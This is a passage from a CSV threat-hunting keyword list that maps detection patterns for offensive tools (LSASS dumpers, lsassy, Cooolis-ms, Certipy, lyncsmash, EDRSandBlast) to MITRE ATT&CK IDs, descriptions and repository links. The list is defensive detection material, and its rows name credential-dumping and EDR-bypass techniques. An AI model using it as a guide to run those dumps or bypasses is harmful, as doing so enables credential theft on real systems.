TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsarpc_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*LSASecretDefaultPassword*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*lsasecrets.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*lsass comsvcs*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*lsass direct*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*Lsass Dump File Created*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z" +"*lsass dump from agent*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*LSASS dump might fail if RunAsPPL is enabled*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*lsass.dmp*","offensive_tool_keyword","AD exploitation cheat sheet","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*lsass.dmp*","offensive_tool_keyword","lsass","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1110","N/A","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*lsass.dmp*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*lsass.exe*.dmp*","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","0","N/A","N/A","8","774","137","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" +"*lsass.exe*C:\temp\tmp.tmp*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*lsass_*.dmp*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*lsass_dump_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*lsass_dump_lsassy_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*lsassdump.dmp*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*LsassDump_20*.ps1*","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","984","166","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z" +"*lsassdumps*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Lsass-Mdump*","signature_keyword","Antivirus Signature","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1110","TA0006","N/A","N/A","Credential Access","lsass dump malware signature","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*LSASSProtectionBypass*/","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*LsassSilentProcessExit.cpp*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*LsassSilentProcessExit.exe*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*LsassSilentProcessExit.vcxproj*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*LsassSilentProcessExit-master*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*lsassy *","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*lsassy -*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*lsassy -v -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*lsassy.*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*lsassy/dumpmethod*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*lsassy_dump*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*lsassy_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*lsassy_dump.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*lsassy-linux-x64-*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*lsassy-MacOS-x64-*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*lsassy-windows-x64-*.exe","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*lse.sh -l*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*luckystrike.ps1*","offensive_tool_keyword","luckystrike","A PowerShell based utility for the creation of malicious Office macro documents.","T1566 - T1059 - T1027","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/curi0usJack/luckystrike","1","1","N/A","N/A","10","1084","250","2017-11-03T17:52:13Z","2016-09-22T18:57:50Z" +"*LUgsLS1IT1NU*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*luijait/PwnKit*","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tools","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","1","79","14","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z" +"*luks2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*lures create *","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" +"*LVAsLS1QT1JU*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*LW8sLS1vcHRpb25z*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*LWIsLS1idWNrZXQ=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*LWYsLS1maWxl*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*LXAsLS1waWQ=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*LXAsLS1wYXlsb2Fk*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*LXUsLS11cmk=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*ly4k/Certipy*","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","6","536","53","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" +"*ly4k/Certipy*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*ly4k/PassTheChallenge*","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1552.004","TA0003","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","4","308","22","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" +"*lyncsmash*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations","T1580 - T1201 - T1071 - T1110 - T1078","TA0043 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*lyncsmash.git*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*lyncsmash.log*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*lyncsmash.py*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*lyncsmash-master*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft 